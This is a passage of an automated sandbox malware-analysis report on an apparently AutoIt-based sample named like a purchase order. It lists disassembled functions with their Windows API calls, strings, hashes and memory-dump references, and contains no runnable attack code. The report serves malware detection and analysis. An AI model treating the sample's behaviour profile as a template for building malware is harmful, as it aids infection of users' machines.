                                • API String ID: 942729171-4266983199
                                • Opcode ID: d580bc24f97e4b7c508f3d516a5a667eca1366e0a2cbcabb5e4752a965975b2b
                                • Instruction ID: 5686faf0816ecec6b156ccb49130a1defc4513729ce8fb24d54205a304b25af1
                                • Opcode Fuzzy Hash: d580bc24f97e4b7c508f3d516a5a667eca1366e0a2cbcabb5e4752a965975b2b
                                • Instruction Fuzzy Hash: 7B11A77151563179D7284AA69C45FF7BE68EB227A4F014229F10E86080D770DC41D6F0
                                Function 00179069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free
                                • String ID: 8
                                • API String ID: 269201875-3897458245
                                • Opcode ID: 800d8f8d02625939d640f2c1550d6fd4e8d458960a9eb9c549cafc28f106a12c
                                • Instruction ID: e1ce9667158c49330012af6d387b864f4870bf1a28bbd6372a6ce941f0a8d58f
                                • Opcode Fuzzy Hash: 800d8f8d02625939d640f2c1550d6fd4e8d458960a9eb9c549cafc28f106a12c
                                • Instruction Fuzzy Hash: A811C871A60311A7DB30AB7CBC49B5633A8A75073CF145326F528CB1E1DB70D9478B80
                                Function 001E3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowTextLengthW.USER32(00000000), ref: 001E34AB
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001E34BA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LengthMessageSendTextWindow
                                • String ID: edit
                                • API String ID: 2978978980-2167791130
                                • Opcode ID: ddd86182a93c3f961c219c02b1f293b0538c88fddaac7c062cb46e43173933a9
                                • Instruction ID: 2e7d0b47a85f17fb0774e0d2f9c84b999c345e4860e683ef4b12bf70871a6acc
                                • Opcode Fuzzy Hash: ddd86182a93c3f961c219c02b1f293b0538c88fddaac7c062cb46e43173933a9
                                • Instruction Fuzzy Hash: C111BF71100588AFEB124E65DC88AEF376AEF15374F504324F970971D0C731DD929B50
                                Function 001B6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • CharUpperBuffW.USER32(?,?,?), ref: 001B6CB6
                                • _wcslen.LIBCMT ref: 001B6CC2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharUpper
                                • String ID: STOP
                                • API String ID: 1256254125-2411985666
                                • Opcode ID: 91e21ff79c13f1c8dd8489e4829a7e8263a8e7334f4f2a885158b862f756da5d
                                • Instruction ID: 088d5af765dcec3b54c479d4915abd5065ead735fc314680db80a61a70d89301
                                • Opcode Fuzzy Hash: 91e21ff79c13f1c8dd8489e4829a7e8263a8e7334f4f2a885158b862f756da5d
                                • Instruction Fuzzy Hash: C9010032A00526CBCB20AFFDDC918FF7BB5EB75710B400928E8A29A190EB39D844C650
                                Function 001B1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001B3CCA
                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 001B1C46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassMessageNameSend_wcslen
                                • String ID: ComboBox$ListBox
                                • API String ID: 624084870-1403004172
                                • Opcode ID: 3bb148c78f0c87b09cfd7c153e5a91d5d2fdbe4c2b6aa68ebd58a94232f74a9b
                                • Instruction ID: 5ea96a0037408dc0ed90dbceca7d08da76d8461c0481d1c237844bb828086abf
                                • Opcode Fuzzy Hash: 3bb148c78f0c87b09cfd7c153e5a91d5d2fdbe4c2b6aa68ebd58a94232f74a9b
                                • Instruction Fuzzy Hash: 8B01A775681108F6CB08EB90D9629FF7BA89F66340F540019E8166B282EB209F1C96B2
                                Function 001B1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001B3CCA
                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 001B1CC8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassMessageNameSend_wcslen
                                • String ID: ComboBox$ListBox
                                • API String ID: 624084870-1403004172
                                • Opcode ID: ccd710074e37496f2a0f6bd8c0bca5809918a0e0541a350b01f0907db9488ae3
                                • Instruction ID: 012fd4836a20d8bef3b827731a48e106013bbdb927a636c28b6f9f120157e76a
                                • Opcode Fuzzy Hash: ccd710074e37496f2a0f6bd8c0bca5809918a0e0541a350b01f0907db9488ae3
                                • Instruction Fuzzy Hash: DF01DB75640118F7CB04E794CA11AFF7BE89B21340F950015FC1177281EB209F1DD672
                                Function 00184CDA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00182F5E: EnterCriticalSection.KERNEL32(?,?,00174F08,00000000,002188E0,0000000C,00174EC3,00151129,?,?,00184CB0,00151129,?,00182E29,00000001,00000364), ref: 00182F6D
                                • DeleteCriticalSection.KERNEL32(0021C020,?,?,?,?,00218BE8,00000010,0017914E), ref: 00184D3C
                                • _free.LIBCMT ref: 00184D4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalSection$DeleteEnter_free
                                • String ID: 8
                                • API String ID: 1836352639-3897458245
                                • Opcode ID: f462692750377c20f0598cf1b5d9c57f9e5c5961749ce757ff1ce6389aa37ede
                                • Instruction ID: a7e1e5a69d56c9b06536f5d6583c0048923e471e003f9a3d1a21314f7cf416e6
                                • Opcode Fuzzy Hash: f462692750377c20f0598cf1b5d9c57f9e5c5961749ce757ff1ce6389aa37ede
                                • Instruction Fuzzy Hash: 59115E36560215DFD721AFE8E886BAC73B0BB14328F515245F4559B2B2CB74E9438F44
                                Function 001E8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00223018,0022305C), ref: 001E81BF
                                • CloseHandle.KERNEL32 ref: 001E81D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID: \0"
                                • API String ID: 3712363035-2428598737
                                • Opcode ID: 1bff300e1ea180ed003e92d528049b2b12445c057370e66278166a4e0005ba96
                                • Instruction ID: 2e40c9d42616838996e9349ade22f8f60ebb21a2413dba469735e65309b06851
                                • Opcode Fuzzy Hash: 1bff300e1ea180ed003e92d528049b2b12445c057370e66278166a4e0005ba96
                                • Instruction Fuzzy Hash: 4FF054B1640310BEE220A7A17C49F773A5CEB04751F004420FB0CD91A1D6798B5282F8
                                Function 001D747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen
                                • String ID: 3, 3, 16, 1
                                • API String ID: 176396367-3042988571
                                • Opcode ID: 37e5b951eaf50a0f7e34debccb44a6d083bad41796b274c1f5f677d0e314550e
                                • Instruction ID: d8b50a33ec9524ef5f72f4682182af5cf1362b8ede9105729b58e483d968d7e4
                                • Opcode Fuzzy Hash: 37e5b951eaf50a0f7e34debccb44a6d083bad41796b274c1f5f677d0e314550e
                                • Instruction Fuzzy Hash: BCE02B0221422012923212799CC197F56D9CFE9750710182BFA89C23A6FB948D9193A1
                                Function 001B0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                Download Yara Rule
                                APIs
                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001B0B23
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Message
                                • String ID: AutoIt$Error allocating memory.
                                • API String ID: 2030045667-4017498283
                                • Opcode ID: 6735a3df0f753386a8cf09c638a6d5f5beb310f7806833abef765eb20b0dc1f2
                                • Instruction ID: b522ed2816181fe1fa2d91f2f4153885c91ced9d734d2f32e260b30b0f567427
                                • Opcode Fuzzy Hash: 6735a3df0f753386a8cf09c638a6d5f5beb310f7806833abef765eb20b0dc1f2
                                • Instruction Fuzzy Hash: A0E0D8312843586BD21437957C03FCD7A848F19F25F20046AFB58994C38BE228A106E9
                                Function 00179141 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00184CDA: DeleteCriticalSection.KERNEL32(0021C020,?,?,?,?,00218BE8,00000010,0017914E), ref: 00184D3C
                                  • Part of subcall function 00184CDA: _free.LIBCMT ref: 00184D4A
                                  • Part of subcall function 00184D7A: _free.LIBCMT ref: 00184D9C
                                • DeleteCriticalSection.KERNEL32(00E1EE18), ref: 0017916A
                                • _free.LIBCMT ref: 0017917E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$CriticalDeleteSection
                                • String ID: 8
                                • API String ID: 1906768660-3897458245
                                • Opcode ID: 48babaa7add179291dedab5ab6fbd2436407d191e0683475e05e74b32fbf6b9b
                                • Instruction ID: bed3602634e0a0e45c4f273efe46c94062bc9da7d95a50adb388372a32d3c222
                                • Opcode Fuzzy Hash: 48babaa7add179291dedab5ab6fbd2436407d191e0683475e05e74b32fbf6b9b
                                • Instruction Fuzzy Hash: BEE01A37820560EBC732BBE8FC99A9977A4BB59328B16141AF40993132CB21BC538B44
                                Function 00170D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0016F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00170D71,?,?,?,0015100A), ref: 0016F7CE
                                • IsDebuggerPresent.KERNEL32(?,?,?,0015100A), ref: 00170D75
                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0015100A), ref: 00170D84
                                Strings
                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00170D7F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                • API String ID: 55579361-631824599
                                • Opcode ID: 767e5cc5c23725548c49dff5bea51ddb57795cea1c013934f6da556870e0da2c
                                • Instruction ID: 1ecf9bbbeb07ae63412d363eacc90ded98c658e9610da08c45e8baff5d4faca0
                                • Opcode Fuzzy Hash: 767e5cc5c23725548c49dff5bea51ddb57795cea1c013934f6da556870e0da2c
                                • Instruction Fuzzy Hash: 8FE06D742007818FD3319FF9E94874A7BF1EB18744F00896DE89ACA651EBB0E4868B91
                                Function 0016E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0016E3D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: 0%"$8%"
                                • API String ID: 1385522511-3788803983
                                • Opcode ID: 6327a739b9408ed411e364921c35949e7bdaf554e2ddf2df6ae23832d3ba7f46
                                • Instruction ID: d619edb0e12bfc303d7e298afb9e4b9e67d831740ed940c398311992d8affb43
                                • Opcode Fuzzy Hash: 6327a739b9408ed411e364921c35949e7bdaf554e2ddf2df6ae23832d3ba7f46
                                • Instruction Fuzzy Hash: 06E02636810A20FBCA1D975CFE58A8833A1BF18320BD0A268E4028F2D19B3628768644
                                Function 001C3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001C302F
                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001C3044
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Temp$FileNamePath
                                • String ID: aut
                                • API String ID: 3285503233-3010740371
                                • Opcode ID: 3b53b76085a8121009f87d432492e180ab02e1e188c50920210ee1498e0725ba
                                • Instruction ID: 410ae1509be0c9d4359b6a238850cdf57ee8c7a2887503001cb1b80c720b5ab3
                                • Opcode Fuzzy Hash: 3b53b76085a8121009f87d432492e180ab02e1e188c50920210ee1498e0725ba
                                • Instruction Fuzzy Hash: 39D05E7290032867DA20A7E4AC4EFCF7A7CEB05751F0002A1BB55E6091DAB099C5CAD0
                                Function 001AD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LocalTime
                                • String ID: %.3d$X64
                                • API String ID: 481472006-1077770165
                                • Opcode ID: d6bf02c5a1160943136f4d806227390f76325b91ebe04c43ee7aa0d744fe9dcf
                                • Instruction ID: afa0c6353f5650894943ad4bd79274df72d4393c238372b3ec9a200c448fb1b7
                                • Opcode Fuzzy Hash: d6bf02c5a1160943136f4d806227390f76325b91ebe04c43ee7aa0d744fe9dcf
                                • Instruction Fuzzy Hash: 53D012A9C08509E9CB5496D0EC45AFAB3BCBB1A341F528453FD07D1440D724C559E762
                                Function 001E2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                Download Yara Rule
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001E232C
                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001E233F
                                  • Part of subcall function 001BE97B: Sleep.KERNEL32 ref: 001BE9F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: 275442bdb2a280d108cfc0e3a6e60c82fe630e62714b18a446bcfef7a5d163c1
                                • Instruction ID: e57750987ea396fa223f91b42a4b32ff763b37ced48f95a6e1ec01358bf0cdca
                                • Opcode Fuzzy Hash: 275442bdb2a280d108cfc0e3a6e60c82fe630e62714b18a446bcfef7a5d163c1
                                • Instruction Fuzzy Hash: 8DD0C9363D5350BAE664A7B0DC4FFCBAA549B14B14F044916B645AA1D0CAA0A8868A94
                                Function 001E2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                Download Yara Rule
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001E236C
                                • PostMessageW.USER32(00000000), ref: 001E2373
                                  • Part of subcall function 001BE97B: Sleep.KERNEL32 ref: 001BE9F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: 321cce5beb37f7be9e2b8b97eee6bdf3a7ac1638d31bfed4f6d3a05e24bb8448
                                • Instruction ID: 1ce3e3fba8c06d0c8eee10c6219fc57525596253e0336a4c8d25ef29e51092d7
                                • Opcode Fuzzy Hash: 321cce5beb37f7be9e2b8b97eee6bdf3a7ac1638d31bfed4f6d3a05e24bb8448
                                • Instruction Fuzzy Hash: 0DD0C9363D1350BAE664A7B0DC4FFCBA6549B15B14F044916B645AA1D0CAA0B8868A94